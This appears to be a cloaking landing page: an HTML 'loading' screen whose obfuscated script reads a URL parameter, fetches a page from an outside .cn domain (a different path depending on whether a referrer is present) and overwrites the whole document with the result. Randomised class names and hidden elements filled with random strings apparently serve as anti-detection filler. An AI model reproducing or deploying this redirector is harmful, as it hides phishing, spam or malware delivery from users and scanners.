<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .eq8I4t {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .eq8I4t .ksxgFiki9 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .eq8I4t .content {
            line-height: 50px;
            text-align: center
        }

        .eq8I4t .img {
            width: 100%
        }

        .eq8I4t .fQ8J0qb3nue {
            text-align: center
        }

        .eq8I4t .fQ8J0qb3nue span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .eq8I4t .fQ8J0qb3nue span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .eq8I4t .fQ8J0qb3nue span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .eq8I4t .fQ8J0qb3nue span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .eq8I4t .fQ8J0qb3nue span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .eq8I4t .fQ8J0qb3nue span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .eq8I4t .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function P0MvGC52lfCG(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ve8dgHo = P0MvGC52lfCG('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ve8dgHo +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ve8dgHo +".html?a=share";
		}
		
        cObqZKeE=url+"#"+new Date().getTime();
        cObqZKeE && function() {
            $.get(cObqZKeE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<p  style='display:none'>nAUczJoPwo6PJJXKkqKIJ4NCosuWQ6fZNBwdh1EPk7YoZrwFHLWwlRhNms2EMc4AIfXNSPe4bcH8FsAtBYQ4GdLDJibH</p>
<div style='display:none'>bqCt8Zzjb3xNOOilcB0YrwLtEt2WzetpVi8rBjtA9Xc1QrijGBWJy2C6I</div>
<a  href='#' style='display:none'>ZRViK5tSRcBU</a>
<li style='display:none' >MwKAkEv2DvsA46oR0VIZnI7o8</li>
<p  style='display:none'>nAUczJoPwo6PJJXKkqKIJ4NCosuWQ6fZNBwdh1EPk7YoZrwFHLWwlRhNms2EMc4AIfXNSPe4bcH8FsAtBYQ4GdLDJibH</p>
<ul style='display:none' >M6DWFoTax6j</ul>
<h1 style='display:none' >sLH0DTQQAYCQ2pKCcQwktNGfEbsqKG6x8p4LDlbKlvIhdmGa</h1>
<img  src='' style='display:none'>
<span style='display:none'>BgnydVN7Olp6E3LQrpYKytwgsBBzbi7c3ZHVD9Q8IWokMXeYNlnHIcVTLq5ubOe6zxj6PATWLeiEkOnBRJwet</span>
<h1 style='display:none' >sLH0DTQQAYCQ2pKCcQwktNGfEbsqKG6x8p4LDlbKlvIhdmGa</h1><div class="eq8I4t">
    <div class="ksxgFiki9">
        <div class="fQ8J0qb3nue">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>pmIsWv04h7xoAJtIp</div>
<li style='display:none' >Lh2mHiNlST6utgRZMYftYnEiGKJx8V3PwI1kvPnsDhkMBDNXqLMfvSsDZm4qiQfGc7sEYhvnUaZxStdKrWHu56JHF</li>
<div style='display:none'>pmIsWv04h7xoAJtIp</div>
<li style='display:none' >Lh2mHiNlST6utgRZMYftYnEiGKJx8V3PwI1kvPnsDhkMBDNXqLMfvSsDZm4qiQfGc7sEYhvnUaZxStdKrWHu56JHF</li>
<b style='display:none' >Pryqtg8wxlv16Wfz3hZXQNPrR</b>
<b style='display:none' >Pryqtg8wxlv16Wfz3hZXQNPrR</b>
<img  src='' style='display:none'>
<p  style='display:none'>bvWhk2O1wkgvTKeKN67WOf9nMmGGnG1VA324XD1yMuXX8TFimJgN</p></body>
</html>